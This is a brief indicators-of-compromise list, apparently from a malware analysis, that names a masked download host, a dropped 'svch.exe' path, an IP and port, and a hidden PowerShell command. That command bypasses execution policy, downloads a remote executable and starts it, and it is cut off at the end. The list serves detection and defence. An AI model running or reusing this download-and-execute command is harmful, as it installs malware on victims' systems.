Technical Information
- http://ha###.502ok.com/hm as c:/windows/inf/svch.exe
- agmkis2
- '11#.#7.198.180':6688
- DNS ASK ha###.502ok.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...' (with hidden window)